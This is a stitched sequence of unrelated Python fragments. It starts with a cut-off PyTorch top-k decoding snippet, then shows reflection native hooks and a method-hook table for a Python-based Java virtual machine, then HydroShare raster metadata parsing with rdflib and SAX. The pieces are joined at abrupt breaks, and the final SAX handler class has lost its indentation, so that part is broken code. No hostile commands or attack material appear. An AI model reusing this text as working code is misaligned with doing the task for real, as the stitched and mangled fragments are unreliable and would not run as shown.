if not self.training:
probs = F.softmax(logits, dim=-1) # [BS,max_nwords,output_dim]
if topk > 1:
topk_values, topk_inds = \
torch.topk(probs, topk, dim=-1, largest=True,
sorted=True) # -> (Tensor, LongTensor) | |
cls, method):
return vmfield_get_helper(locals, "ref")
def VMField_getType(locals, loader, cls, method):
    """Native implementation of java.lang.reflect.VMField.getType().

    Finds the field with the same name as this VMField in the declaring
    class's field table and returns the java.lang.Class object for its
    descriptor (reference type or primitive).
    """
    this = locals.get(0, "ref")  # the VMField instance
    clazz = this.fields.get('clazz', "ref")  # declaring class object
    name = unpack_string(this.fields.get('name', "ref"))
    const = clazz.class_type.cls.constant_pool
    # Linear scan of the declared fields for a matching name.
    for i in range(clazz.class_type.cls.fields_count):
        f = clazz.class_type.cls.fields[i]
        fname = const[f.name_index]
        descr = const[f.descriptor_index]
        if fname==name:
            break
    # NOTE(review): if no field matches, `descr` keeps the last field's
    # descriptor (or is unbound for a class with zero fields) — confirm
    # callers only pass names of existing fields.
    if descr.startswith("L"):
        # Reference type "Lsome/Class;": strip 'L' and ';' to get the name.
        cls_name = descr[1:-1]
        return vmobject_getClass_helper(loader.getclass(cls_name), loader)
    else:
        # Primitive descriptor. NOTE(review): array descriptors ("[...") also
        # take this branch — confirm get_primitive_class_helper handles them.
        prim_cls = get_primitive_class_helper(descr, loader)
        return prim_cls
def VMField_getModifiersInternal(locals, loader, cls, method):
    """Native implementation of VMField.getModifiersInternal().

    Returns the access_flags bitmask of the field with the same name as this
    VMField, taken from the declaring class's field table.
    """
    this = locals.get(0, "ref")  # the VMField instance
    clazz = this.fields.get('clazz', "ref")  # declaring class object
    name = unpack_string(this.fields.get('name', "ref"))
    const = clazz.class_type.cls.constant_pool
    # Linear scan; `flags` is taken from the matching field.
    for i in range(clazz.class_type.cls.fields_count):
        f = clazz.class_type.cls.fields[i]
        fname = const[f.name_index]
        flags = f.access_flags
        if fname==name:
            break
    # NOTE(review): if no field matches (or the class has zero fields),
    # `flags` is the last field's flags or unbound — confirm callers only
    # pass names of existing fields.
    return flags
def VMMethod_getParameterTypes(locals, loader, cls, method):
    """Native implementation of VMMethod.getParameterTypes().

    Parses the method descriptor string character by character up to the
    closing ')' and builds an Arrayref of java.lang.Class objects, one per
    parameter (primitives, references, and arrays of either).
    Note: the `cls` parameter is shadowed by the loop below.
    """
    this = locals.get(0, "ref")  # the VMMethod instance
    descriptor = this.fields.get('descriptor', "ref")
    lst = []  # accumulated java.lang.Class objects
    parseing_ref = False  # currently inside an "L...;" reference name
    ref_name = ""  # characters of the reference name collected so far
    array_dim = 0  # number of pending '[' prefixes
    # TODO: write only one parse method
    for char in descriptor:
        # End of args
        if char==")":
            break
        #parse array-class
        if char=="[":
            array_dim = array_dim +1
        #parse references:
        if char==";":
            # ';' terminates a reference name; resolve it (re-applying any
            # pending array dimensions) and reset the parser state.
            parseing_ref = False
            if not array_dim == 0:
                jcls = loader.getclass("["*array_dim + ref_name)
                array_dim = 0
            else:
                jcls = loader.getclass(ref_name)
            ref_name= ""
            cls = vmobject_getClass_helper(jcls, loader)
            lst.append(cls)
        if parseing_ref:
            # Inside "L...;": accumulate the class-name character and skip
            # the primitive checks below.
            ref_name += char
            continue
        if char=='L':
            # Start of a reference type; name characters follow until ';'.
            parseing_ref = True
        if char=='B'or char == 'C' or char == 'D' or char == 'F' or char == 'I' or char == 'J' or char == 'S' or char == 'Z' or char == 'V':
            # Primitive descriptor (possibly an array of primitives).
            if not array_dim == 0:
                jcls = loader.getclass("["*array_dim + char)
                array_dim = 0
                cls = vmobject_getClass_helper(jcls, loader)
            else:
                cls = get_primitive_class_helper(char , loader)
            lst.append(cls)
    cls_array = Arrayref(lst,None, loader.getclass("[Ljava.lang.Class;"))
    return cls_array
def VMMethod_getExceptionTypes(locals, loader, cls, method):
    """Native implementation of VMMethod.getExceptionTypes().

    Maps each declared exception class name of this VMMethod to its
    java.lang.Class object and returns them as an Arrayref.
    """
    this = locals.get(0, "ref")
    exception_names = this.fields.get('exceptions', "ref")
    # Resolve each name to a loaded class, then to its Class object.
    classes = [
        vmobject_getClass_helper(loader.getclass(ref_name), loader)
        for ref_name in exception_names
    ]
    return Arrayref(classes, None, loader.getclass("[Ljava.lang.Class;"))
# TODO: throws IllegalAccessException, InvocationTargetException
def VMMethod_invoke(locals, loader, cls, method):
    """Native implementation of VMMethod.invoke(Object receiver, Object[] args).

    Unboxes the argument array, invokes the reflected method on the receiver,
    and boxes a primitive result back into its wrapper object.
    """
    this = locals.get(0, "ref")  # the VMMethod instance
    # NOTE: this rebinding shadows the `method` parameter.
    method = this.fields.get('method_info', "ref")
    objref = locals.get(1, "ref")  # the receiver object
    objref_args_array = locals.get(2, "ref")  # Object[] of boxed arguments
    # Stack of unboxed argument values (built in reversed order).
    args = unwrapp_args_helper(objref_args_array)
    const = objref.jcls.cls.constant_pool
    descr = descriptor(const[method.descriptor_index])
    # Push the receiver last — presumably popped first as `this` by
    # invoke_method; TODO confirm the expected argument-stack layout.
    args.push(objref)
    result = loader.invoke_method(objref.jcls.cls, method, descr, args)
    # Box primitive results into their java.lang wrapper objects.
    return wrapp_result(result, descr, loader)
def wrapp_result(value, descr, loader):
    """Box a primitive invocation result into its java.lang wrapper object.

    descr[-1] is the parsed return type name; non-primitive results (and
    void) are returned unchanged.
    """
    # return-type name -> (wrapper class, JVM field type used for 'value')
    boxes = {
        "byte": ("java/lang/Byte", "int"),
        "short": ("java/lang/Short", "int"),
        "int": ("java/lang/Integer", "int"),
        "boolean": ("java/lang/Boolean", "int"),
        "char": ("java/lang/Character", "char"),
        "long": ("java/lang/Long", "long"),
        "float": ("java/lang/Float", "float"),
        "double": ("java/lang/Double", "double"),
    }
    box = boxes.get(descr[-1])
    if box is None:
        # Reference result: pass through unboxed.
        return value
    wrapper_name, field_type = box
    jcls = loader.getclass(wrapper_name)
    objref = Objectref(jcls, True)
    objref.fields.set('value', value, field_type)
    return objref
def unwrapp_args_helper(array):
    """Unbox wrapper objects from a Java Object[] of arguments onto an
    operand Stack, reversed so the first argument ends up on top.

    Note: reverses array.arrayref in place, as the original did.
    """
    # wrapper class name -> JVM type of its 'value' field
    #XXX more...
    unbox = {
        "java/lang/Short": "int",
        "java/lang/Byte": "int",
        "java/lang/Integer": "int",
        "java/lang/Boolean": "int",
        "java/lang/Character": "char",
        "java/lang/Long": "long",
        "java/lang/Float": "float",
        "java/lang/Double": "double",
    }
    stack = Stack()
    elems = array.arrayref
    elems.reverse()
    for elem in elems:
        vtype = unbox.get(elem.jcls.__name__)
        if vtype is None:
            # Not a known wrapper: push the reference itself.
            stack.push(elem)
        else:
            stack.push(elem.fields.get('value', vtype))
    return stack
def VMMethod_getReturnType(locals, loader, cls, method):
    """Native hook: resolve this reflected method's return type to a
    java.lang.Class object.

    The return type is whatever follows ')' in the method descriptor:
    a single primitive code (B, C, D, F, I, J, S, Z or V) or a reference
    descriptor of the form ``Lsome/class/Name;``.
    """
    this = locals.get(0, "ref")
    descr_str = this.fields.get('descriptor', "ref")
    # Locate the end of the parameter list once. The original loop never
    # advanced past the ')' and never broke out, so it recomputed the same
    # result once for every remaining character of the descriptor.
    end = descr_str.find(')')
    if end == -1:
        # Malformed descriptor: preserve the original fallback of returning
        # the incoming cls argument untouched.
        return cls
    ret = descr_str[end + 1:]
    if ret in ('B', 'C', 'D', 'F', 'I', 'J', 'S', 'Z', 'V'):
        return get_primitive_class_helper(ret, loader)
    # Reference type: strip the leading 'L' and trailing ';'.
    # NOTE(review): array return types ('[...') are not handled here, which
    # matches the original behavior — confirm whether they can occur.
    jcls = loader.getclass(ret[1:-1])
    return vmobject_getClass_helper(jcls, loader)
def VMMethod_getModifiersInternal(locals, loader, cls, method):
    """Native hook: expose the raw access_flags bitmask of the wrapped
    method_info."""
    info = locals.get(0, "ref").fields.get('method_info', "ref")
    return info.access_flags
def VMConstructor_getParameterTypes(locals, loader, cls, method):
    """Native hook: build a Class[] array holding the parameter types of
    this reflected constructor, parsed from its descriptor in the
    declaring class's constant pool."""
    this = locals.get(0, "ref")
    method_info = this.fields.get('method_info', "ref")
    clazz = this.fields.get('clazz', "ref")
    pool = clazz.class_type.cls.constant_pool
    descr = pool[method_info.descriptor_index]
    classes = []
    in_ref = False   # currently scanning a reference-type name (after 'L')
    ref_chars = ""   # accumulated class name of the current reference type
    dims = 0         # pending array dimensions ('[' prefixes)
    # TODO: write only one parse method
    for ch in descr:
        # End of the parameter list
        if ch == ")":
            break
        # One more array dimension for the next type
        if ch == "[":
            dims = dims + 1
        # End of a reference-type name
        if ch == ";":
            in_ref = False
            if dims != 0:
                jcls = loader.getclass("[" * dims + ref_chars)
                dims = 0
            else:
                jcls = loader.getclass(ref_chars)
            ref_chars = ""
            classes.append(vmobject_getClass_helper(jcls, loader))
        if in_ref:
            ref_chars += ch
            continue
        # Start of a reference type
        if ch == 'L':
            in_ref = True
        # Primitive type codes
        if ch in ('B', 'C', 'D', 'F', 'I', 'J', 'S', 'Z', 'V'):
            if dims != 0:
                jcls = loader.getclass("[" * dims + ch)
                dims = 0
                classes.append(vmobject_getClass_helper(jcls, loader))
            else:
                classes.append(get_primitive_class_helper(ch, loader))
    return Arrayref(classes, None, loader.getclass("[Ljava.lang.Class;"))
def VMConstructor_getExceptionTypes(locals, loader, cls, method):
    """Native hook: return a Class[] of the checked exception types this
    reflected constructor declares (from its 'exceptions' field)."""
    this = locals.get(0, "ref")
    exc_names = this.fields.get('exceptions', "ref")
    classes = [vmobject_getClass_helper(loader.getclass(name), loader)
               for name in exc_names]
    return Arrayref(classes, None, loader.getclass("[Ljava.lang.Class;"))
def VMConstructor_getModifiersInternal(locals, loader, cls, method):
    """Native hook: expose the raw access_flags bitmask of the wrapped
    constructor's method_info."""
    info = locals.get(0, "ref").fields.get('method_info', "ref")
    return info.access_flags
def VMConstructor_construct(locals, loader, cls, method):
    """Native hook for Constructor.newInstance(): allocate a new object of
    the declaring class, run the wrapped constructor on it, and return the
    new object reference."""
    this = locals.get(0, "ref")
    objref_args_array = locals.get(1, "ref")  # Object[] of boxed ctor arguments
    clazz = this.fields.get('clazz', "ref")
    method_info = this.fields.get(u'method_info', "ref")
    objref = Objectref(clazz.class_type, True) # new this
    # TODO: call constructor
    args = unwrapp_args_helper(objref_args_array)
    const = clazz.class_type.cls.constant_pool
    descr = descriptor(const[method_info.descriptor_index])
    # Receiver goes on top of the unboxed args: local slot 0 of the <init> call.
    args.push(objref)
    # TODO(review): exceptions raised by the constructor should be wrapped in
    # java/lang/reflect/InvocationTargetException (see commented code below).
    #try:
    loader.invoke_method(objref.jcls.cls, method_info, descr, args)
    #except Exception:
    #    jcls = loader.getclass("java/lang/reflect/InvocationTargetException")
    #    objref = Objectref(jcls, True)
    #    raise JException(objref)
    return objref
#TODO: Test me!
def VMConstructor_getSignature(locals, loader, cls, method):
    """Native hook: return this constructor's raw type descriptor as a
    java.lang.String object."""
    this = locals.get(0, "ref")
    clazz = this.fields.get('clazz', "ref")
    info = this.fields.get('method_info', "ref")
    descr = clazz.class_type.cls.constant_pool[info.descriptor_index]
    return make_String(descr, loader)
def vmfield_set_helper(locals, _type):
    """Shared implementation for the VMField.setXxx() native hooks.

    Writes local 2 (the new value, of JVM type *_type*) into the field
    named by this VMField on the target object (local 1).
    """
    this = locals.get(0, "ref")
    objectref = locals.get(1, "ref")
    value = locals.get(2, _type)
    clazz = this.fields.get('clazz', "ref")
    # Access check is unfinished: a class mismatch currently falls through.
    if not objectref.jcls.__name__ == clazz.class_type.__name__:
        pass #TODO: throw IllegalAccessException
    name = this.fields.get('name', "ref")
    string = unpack_string(name)
    # check if private (result currently unused until the calling class
    # can be determined — see TODO below)
    f_info = find_field_info(clazz.class_type.cls, string)
    is_private = f_info.access_flags & 0x2 == 0x2
    # TODO: find calling class
    try:
        objectref.fields.set(string, value, _type)
    except KeyError:
        pass #TODO: throw IllegalAccessException
# TODO: IllegalAccessException, IllegalArgumentException
# NullPointerException, ExceptionInInitializerError
def vmfield_get_helper(locals, _type):
    """Shared implementation for the VMField.getXxx() native hooks.

    Reads the field named by this VMField (of JVM type *_type*) from the
    target object (local 1), or from the declaring class's static fields
    when no target object is given. Returns None when the lookup fails
    (pending proper exception handling — see TODOs).
    """
    this = locals.get(0, "ref")
    objectref = locals.get(1, "ref")
    clazz = this.fields.get('clazz', "ref")
    name = this.fields.get('name', "ref")
    string = unpack_string(name)
    # Fix: 'result' was previously unbound when the lookup raised KeyError,
    # turning the intended best-effort 'pass' into a NameError at return.
    result = None
    if objectref is None:
        # No receiver: treat as a static field access.
        try:
            result = clazz.class_type.static_fields.get(string, _type)
        except KeyError:
            pass #TODO: exception if not static
        return result
    elif not objectref.jcls.__name__ == clazz.class_type.__name__:
        pass #TODO: throw IllegalAccessException
    try:
        result = objectref.fields.get(string, _type)
    except KeyError:
        pass #TODO: throw IllegalAccessException
    return result
def find_field_info(cls, name):
    """Return the field_info entry of *cls* whose constant-pool name equals
    *name*, or None when no field matches."""
    pool = cls.constant_pool
    for idx in range(cls.fields_count):
        candidate = cls.fields[idx]
        if pool[candidate.name_index] == name:
            return candidate
    return None  # not found
def check_primitive(name):
    """Return True when *name* is the name of a Java primitive type
    (including 'void'), False otherwise."""
    return name in ("boolean", "byte", "short", "int", "char",
                    "long", "float", "double", "void")
def check_interface(classref):
    """Return True when the referenced class's access flags mark it as an
    interface (0x0200, optionally combined with ABSTRACT as 0x0600)."""
    flags = classref.class_type.cls.access_flags
    return flags in (0x0200, 0x0600)
HOOKS = {
("java/lang/reflect/VMConstructor","getSignature"):VMConstructor_getSignature,("java/lang/reflect/VMConstructor","construct"):VMConstructor_construct,
("java/lang/reflect/VMConstructor","getExceptionTypes"):VMConstructor_getExceptionTypes,
("java/lang/reflect/VMConstructor","getModifiersInternal"):VMConstructor_getModifiersInternal,
("java/lang/reflect/VMConstructor", "getParameterTypes"):VMConstructor_getParameterTypes,
("java/lang/reflect/VMMethod","invoke"):VMMethod_invoke,
("java/lang/reflect/VMMethod","getExceptionTypes"):VMMethod_getExceptionTypes,
("java/lang/reflect/VMMethod", "getReturnType"):VMMethod_getReturnType,
("java/lang/reflect/VMMethod", "getModifiersInternal"):VMMethod_getModifiersInternal,
("java/lang/reflect/VMMethod", "getParameterTypes"):VMMethod_getParameterTypes,
("java/lang/reflect/VMField", "getModifiersInternal"):VMField_getModifiersInternal,
("java/lang/reflect/VMField", "getType"):VMField_getType,
("java/lang/reflect/VMField", "setInt"):VMField_setInt,
("java/lang/reflect/VMField", "setByte"):VMField_setByte,
("java/lang/reflect/VMField", "setShort"):VMField_setShort,
("java/lang/reflect/VMField", "setLong"):VMField_setLong,
("java/lang/reflect/VMField", "setFloat"):VMField_setFloat,
("java/lang/reflect/VMField", "setDouble"):VMField_setDouble,
("java/lang/reflect/VMField", "setBoolean"):VMField_setBoolean,
("java/lang/reflect/VMField", "setChar"):VMField_setChar,
("java/lang/reflect/VMField", "set"):VMField_set,
("java/lang/reflect/VMField", "getInt"):VMField_getInt,
("java/lang/reflect/VMField", "getByte"):VMField_getByte,
("java/lang/reflect/VMField", "getShort"):VMField_getShort,
("java/lang/reflect/VMField", "getLong"):VMField_getLong,
("java/lang/reflect/VMField", "getFloat"):VMField_getFloat,
("java/lang/reflect/VMField", "getDouble"):VMField_getDouble,
("java/lang/reflect/VMField", "getBoolean"):VMField_getBoolean,
("java/lang/reflect/VMField", "getChar"):VMField_getChar,
("java/lang/reflect/VMField", "get"):VMField_get,
("java/lang/VMClass", "isInterface"):VMClass_isInterface,
("java/lang/VMClass", "getName"):VMClass_getName,
("java/lang/VMClass", "getSuperclass"):VMClass_getSuperclass,
("java/lang/VMClass", "getInterfaces"):VMClass_getInterfaces,
("java/lang/VMClass", "getDeclaredClasses"):VMClass_getDeclaredClasses,
("java/lang/VMClass", "getDeclaredFields"):VMClass_getDeclaredFields,
("java/lang/VMClass", "getDeclaredMethods"):VMClass_getDeclareMethods,
("java/lang/VMClass", "getDeclaredConstructors"):VMClass_getDeclaredConstructors,
("java/lang/VMClass", "getClassLoader"):VMClass_getClassLoader,
("java/lang/VMClass", "forName"):VMClass_forName,
("java/lang/VMClass", "isArray"):VMClass_isArray,
("java/lang/VMClass", "initialize"):VMClass_initialize,
("java/lang/VMClass", "loadArrayClass"):VMClass_loadArrayClass,
("java/lang/VMClass", "throwException"):VMClass_throwException,
("java/lang/VMClass", "isInstance"):VMClass_isInstance,
("java/lang/VMClass", "isAssignableFrom"):VMClass_isAssignableForm,
("java/lang/VMClass", "isPrimitive"):VMClass_isPrimitive,
("java/lang/VMClass", "getComponentType"):VMClass_getComponentType,
("java/lang/VMClass", "getModifiers"):VMClass_getModifiers,
("java/lang/VMClass", "getDeclaringClass"):VMClass_getDeclaringClass,
("java/lang/VMClass", "isSynthetic"):VMClass_isSynthetic,
("java/lang/VMClass", "isAnnotation"):VMClass_isAnnotation,
("java/lang/VMClass", "isEnum"):VMClass_isEnum,
#("java/lang/VMClass", "getSimpleName"):VMClass_getSimpleName,
("java/lang/VMClass", "getCanonicalName"):VMClass_getCanonicalName,
("java/lang/VMClass", "getEnclosingClass"):VMClass_getEnclosingClass,
("java/lang/VMClass", "getEnclosingConstructor"):VMClass_getEnclosingConstructor,
("java/lang/VMClass", "getEnclosingMethod"):VMClass_getEnclosingMethod,
("java/lang/VMClass", "getClassSignature"):VMClass_getClassSignature,
("java/lang/VMClass", "isAnonymousClass"):VMClass_isAnonymousClass,
("java/lang/VMClass", "isLocalClass"):VMClass_isLocalClass,
("java/lang/VMClass", "isMemberClass"):VMClass_isMemberClass,
("java/lang/VMObject","getClass"):VMObject_getClass,
("java/lang/VMObject","clone"):VMObject_clone,
("java/lang/VMObject","notify"):VMObject_notify,
("java/lang/VMObject","notifyAll"):VMObject_notifyAll,
("java/lang/VMObject","wait"):VMObject_wait,
("java/lang/VMClassLoader","defineClass"):VMClassLoader_defineClass,
("java/lang/VMClassLoader","resolveClass"):VMClassLoader_resolveClass,
("java/lang/VMClassLoader","loadClass"):VMClassLoader_loadClass,
("java/lang/VMClassLoader","getPrimitiveClass"):VMClassLoader_getPrimitiveClass,
#("java/lang/VMClassLoader","getResource"):VMClassLoader_getResource,
#("java/lang/VMClassLoader","getResources"):VMClassLoader_getResources,
("java/lang/VMClassLoader","getPackage"):VMClassLoader_getPackage,
("java/lang/VMClassLoader","getPackages"):VMClassLoader_getPackages,
#("java/lang/VMClassLoader","defaultAssertionStatus"):VMClassLoader_defaultAssertionStatus,
("java/lang/VMClassLoader","packageAssertionStatus"):VMClassLoader_packageAssertionStatus,
("java/lang/VMClassLoader","classAssertionStatus"):VMClassLoader_classAssertionStatus,
("java/lang/VMClassLoader","getSystemClassLoader"):VMClassLoader_getSystemClassLoader,
("java/lang/VMSystem","arraycopy"):VMSystem_arraycopy,
("java/lang/VMSystem","identityHashCode"):VMSystem_identityHashCode,
("java/lang/VMSystem","setIn"):VMSystem_setIn,
("java/lang/VMSystem","setOut"):VMSystem_setOut,
("java/lang/VMSystem","setErr"):VMSystem_setErr,
("java/lang/VMSystem","currentTimeMillis"):VMSystem_currentTimeMillis,
("java/lang/VMSystem","getenv"):VMSystem_getenv,
#("java/lang/VMSystem","makeStandardInputStream"):VMSystem_makeStandardInputStream,
#("java/lang/VMSystem","makeStandardOutputStream"):VMSystem_makeStandardOutputStream,
#("java/lang/VMSystem","makeStandardErrorStream"):VMSystem_makeStandardErrorStream,
| |
import xml.sax
import rdflib
from django.db import transaction
from hs_core.serialization import GenericResourceMeta
class RasterResourceMeta(GenericResourceMeta):
    """
    Lightweight class for representing metadata of RasterResource instances.
    """
    def __init__(self):
        super(RasterResourceMeta, self).__init__()

        self.cell_info = None
        self.band_info = []
        self.spatial_reference = None

    def _read_resource_metadata(self):
        """
        Read raster-specific metadata (CellInformation, BandInformation and
        spatialReference) from the resource's RDF+XML metadata.

        :raises: GenericResourceMeta.ResourceMetaException when a required
        metadata element is missing.
        """
        super(RasterResourceMeta, self)._read_resource_metadata()

        print("--- RasterResourceMeta ---")

        # Also parse using SAX so that we can capture certain metadata elements
        # in the same order in which they appear in the RDF+XML serialization.
        SAX_parse_results = RasterResourceSAXHandler()
        xml.sax.parse(self.rmeta_path, SAX_parse_results)

        hsterms = rdflib.namespace.Namespace('http://hydroshare.org/terms/')
        # Get CellInformation
        for s, p, o in self._rmeta_graph.triples((None, hsterms.CellInformation, None)):
            self.cell_info = RasterResourceMeta.CellInformation()
            # Get name
            name_lit = self._rmeta_graph.value(o, hsterms.name)
            if name_lit is None:
                msg = "Name for CellInformation was not found for resource {0}".\
                    format(self.root_uri)
                raise GenericResourceMeta.ResourceMetaException(msg)
            self.cell_info.name = str(name_lit)
            # Get rows
            rows_lit = self._rmeta_graph.value(o, hsterms.rows)
            if rows_lit is None:
                msg = "Rows attribute was not found for CellInformation for resource {0}".\
                    format(self.root_uri)
                raise GenericResourceMeta.ResourceMetaException(msg)
            self.cell_info.rows = int(str(rows_lit))
            # Get columns
            columns_lit = self._rmeta_graph.value(o, hsterms.columns)
            if columns_lit is None:
                msg = "Columns attribute was not found for CellInformation for resource {0}".\
                    format(self.root_uri)
                raise GenericResourceMeta.ResourceMetaException(msg)
            self.cell_info.columns = int(str(columns_lit))
            # Get cellSizeXValue
            cellX_lit = self._rmeta_graph.value(o, hsterms.cellSizeXValue)
            if cellX_lit is None:
                msg = "cellSizeXValue attribute was not found for CellInformation "
                msg += "for resource {0}"
                msg = msg.format(self.root_uri)
                raise GenericResourceMeta.ResourceMetaException(msg)
            self.cell_info.cellSizeXValue = float(str(cellX_lit))
            # Get cellSizeYValue
            cellY_lit = self._rmeta_graph.value(o, hsterms.cellSizeYValue)
            if cellY_lit is None:
                msg = "cellSizeYValue attribute was not found for CellInformation "
                msg += "for resource {0}"
                msg = msg.format(self.root_uri)
                raise GenericResourceMeta.ResourceMetaException(msg)
            self.cell_info.cellSizeYValue = float(str(cellY_lit))
            # Get cellDataType
            celldt_lit = self._rmeta_graph.value(o, hsterms.cellDataType)
            if celldt_lit is None:
                msg = "cellDataType attribute was not found for CellInformation "
                msg += "for resource {0}"
                msg = msg.format(self.root_uri)
                raise GenericResourceMeta.ResourceMetaException(msg)
            self.cell_info.cellDataType = str(celldt_lit)
            # Get noDataValue (optional)
            nodata_lit = self._rmeta_graph.value(o, hsterms.noDataValue)
            if nodata_lit is not None:
                self.cell_info.noDataValue = float(str(nodata_lit))
            print("\t\t{0}".format(self.cell_info))

        # Get BandInformation
        # NOTE(review): a SAX ContentHandler instance is always truthy, so the
        # RDF fallback below is never taken — confirm whether this was meant to
        # test SAX_parse_results.band_info instead.
        if SAX_parse_results:
            # Use band info from SAX parser
            self.band_info = list(SAX_parse_results.band_info)
        else:
            # Get band info from RDF
            for s, p, o in self._rmeta_graph.triples((None, hsterms.BandInformation, None)):
                band_info = RasterResourceMeta.BandInformation()
                # Get name
                name_lit = self._rmeta_graph.value(o, hsterms.name)
                if name_lit is None:
                    msg = "Name for BandInformation was not found for resource {0}".\
                        format(self.root_uri)
                    raise GenericResourceMeta.ResourceMetaException(msg)
                band_info.name = str(name_lit)
                # Get variableName
                varname_lit = self._rmeta_graph.value(o, hsterms.variableName)
                if varname_lit is None:
                    msg = "variableName for BandInformation was not found for resource {0}".\
                        format(self.root_uri)
                    raise GenericResourceMeta.ResourceMetaException(msg)
                band_info.variableName = str(varname_lit)
                # Get variableUnit
                varunit_lit = self._rmeta_graph.value(o, hsterms.variableUnit)
                if varunit_lit is None:
                    msg = "variableUnit for BandInformation was not found for resource {0}".\
                        format(self.root_uri)
                    raise GenericResourceMeta.ResourceMetaException(msg)
                band_info.variableUnit = str(varunit_lit)
                # Get method (optional)
                method_lit = self._rmeta_graph.value(o, hsterms.method)
                if method_lit is not None:
                    band_info.method = str(method_lit)
                # Get comment (optional)
                comment_lit = self._rmeta_graph.value(o, hsterms.comment)
                if comment_lit is not None:
                    band_info.comment = str(comment_lit)
                self.band_info.append(band_info)
        for b in self.band_info:
            print("\t\t{0}".format(str(b)))

        # Get spatialReference
        for s, p, o in self._rmeta_graph.triples((None, hsterms.spatialReference, None)):
            spat_ref_lit = self._rmeta_graph.value(o, rdflib.namespace.RDF.value)
            if spat_ref_lit is None:
                msg = "Spatial reference value not found for {0}.".format(o)
                raise GenericResourceMeta.ResourceMetaException(msg)
            self.spatial_reference = RasterResourceMeta.SpatialReference(str(spat_ref_lit))
            print("\t\t{0}".format(self.spatial_reference))

    @transaction.atomic
    def write_metadata_to_resource(self, resource):
        """
        Write metadata to resource

        :param resource: RasterResource instance
        """
        super(RasterResourceMeta, self).write_metadata_to_resource(resource)

        if self.cell_info:
            # Replace any existing cell information element.
            resource.metadata.cellInformation.delete()
            resource.metadata.create_element('CellInformation', name=self.cell_info.name,
                                             rows=self.cell_info.rows,
                                             columns=self.cell_info.columns,
                                             cellSizeXValue=self.cell_info.cellSizeXValue,
                                             cellSizeYValue=self.cell_info.cellSizeYValue,
                                             cellDataType=self.cell_info.cellDataType,
                                             noDataValue=self.cell_info.noDataValue)
        if len(self.band_info) > 0:
            # Replace any existing band information elements.
            for band in resource.metadata.bandInformation:
                band.delete()
            for b in self.band_info:
                resource.metadata.create_element('BandInformation', name=b.name,
                                                 variableName=b.variableName,
                                                 variableUnit=b.variableUnit, method=b.method,
                                                 comment=b.comment)
        if self.spatial_reference:
            # Replace any existing original coverage element.
            resource.metadata.originalCoverage.delete()
            values = {'units': self.spatial_reference.units,
                      'northlimit': self.spatial_reference.northlimit,
                      'eastlimit': self.spatial_reference.eastlimit,
                      'southlimit': self.spatial_reference.southlimit,
                      'westlimit': self.spatial_reference.westlimit,
                      'projection': self.spatial_reference.projection}
            kwargs = {'value': values}
            resource.metadata.create_element('OriginalCoverage', **kwargs)

    class CellInformation(object):
        """Value object for hsterms:CellInformation metadata."""
        def __init__(self):
            self.name = None
            self.rows = None
            self.columns = None
            self.cellSizeXValue = None
            self.cellSizeYValue = None
            self.cellDataType = None
            self.noDataValue = None  # Optional

        def __str__(self):
            msg = "CellInformation name: {name}, "
            msg += "rows: {rows}, columns: {columns}, "
            msg += "cellSizeXValue: {cellSizeXValue}, cellSizeYValue: {cellSizeYValue}, "
            msg += "cellDataType: {cellDataType}, noDataValue: {noDataValue}"
            msg = msg.format(name=self.name, rows=self.rows,
                             columns=self.columns, cellSizeXValue=self.cellSizeXValue,
                             cellSizeYValue=self.cellSizeYValue, cellDataType=self.cellDataType,
                             noDataValue=self.noDataValue)
            return msg

        def __unicode__(self):
            return unicode(str(self))

    class BandInformation(object):
        """Value object for hsterms:BandInformation metadata."""
        def __init__(self):
            self.name = None
            self.variableName = None
            self.variableUnit = None
            self.method = None  # Optional
            self.comment = None  # Optional

        def __str__(self):
            msg = "BandInformation name: {name}, "
            msg += "variableName: {variableName}, variableUnit: {variableUnit}, "
            msg += "method: {method}, comment: {comment}"
            msg = msg.format(name=self.name, variableName=self.variableName,
                             variableUnit=self.variableUnit, method=self.method,
                             comment=self.comment)
            return msg

        def __unicode__(self):
            return unicode(str(self))

    class SpatialReference(object):
        """Value object for hsterms:spatialReference metadata.

        Fix: the original defined __init__ twice; the second definition
        (taking value_str) silently replaced the first, so no-argument
        construction was broken and attributes for keys absent from the
        input string were never initialized (AttributeError in __str__).
        Merged into a single initializer that sets defaults first and then
        optionally parses a 'key=value;...' string.
        """
        def __init__(self, value_str=None):
            self.northlimit = None
            self.eastlimit = None
            self.southlimit = None
            self.westlimit = None
            self.units = None
            self.projection = None  # Optional
            if value_str is not None:
                self._parse(value_str)

        def _parse(self, value_str):
            # Parse semicolon-separated 'key=value' pairs.
            kvp = value_str.split(';')
            for pair in kvp:
                (key, value) = pair.split('=')
                key = key.strip()
                value = value.strip()
                if key == 'name':
                    self.name = value
                elif key == 'eastlimit':
                    try:
                        self.eastlimit = float(value)
                    except Exception as e:
                        msg = "Unable to parse east limit {0}, error: {1}".format(value,
                                                                                  str(e))
                        raise GenericResourceMeta.ResourceMetaException(msg)
                elif key == 'northlimit':
                    try:
                        self.northlimit = float(value)
                    except Exception as e:
                        msg = "Unable to parse north limit {0}, error: {1}".format(value,
                                                                                   str(e))
                        raise GenericResourceMeta.ResourceMetaException(msg)
                elif key == 'southlimit':
                    try:
                        self.southlimit = float(value)
                    except Exception as e:
                        msg = "Unable to parse south limit {0}, error: {1}".format(value,
                                                                                   str(e))
                        raise GenericResourceMeta.ResourceMetaException(msg)
                elif key == 'westlimit':
                    try:
                        self.westlimit = float(value)
                    except Exception as e:
                        msg = "Unable to parse west limit {0}, error: {1}".format(value,
                                                                                  str(e))
                        raise GenericResourceMeta.ResourceMetaException(msg)
                elif key == 'units':
                    self.units = value
                elif key == 'projection':
                    self.projection = value

        def __str__(self):
            msg = "SpatialReference northlimit: {northlimit}, "
            msg += "eastlimit: {eastlimit}, southlimit: {southlimit}, "
            msg += "westlimit: {westlimit}, units: {units}, projection: {projection}"
            msg = msg.format(northlimit=self.northlimit, eastlimit=self.eastlimit,
                             southlimit=self.southlimit, westlimit=self.westlimit,
                             units=self.units, projection=self.projection)
            return msg

        def __unicode__(self):
            return unicode(str(self))
class RasterResourceSAXHandler(xml.sax.ContentHandler):
def __init__(self):
xml.sax.ContentHandler.__init__(self)
# Content
self.band_info = []
# State variables
self._get_bandinfo = False
self._get_bandinfo_details = False
self._get_bandinfo_name = False
self._bandinfo_name = None
self._get_bandinfo_var_name = False
self._bandinfo_var_name = None
self._get_bandinfo_var_unit = False
self._bandinfo_var_unit = None
self._get_bandinfo_method = False
self._bandinfo_method = None
self._get_bandinfo_comment = False
self._bandinfo_comment = None
def characters(self, content):
if self._get_bandinfo_name:
if len(self.band_info) < 1:
msg = "Error: haven't yet encountered band information, "
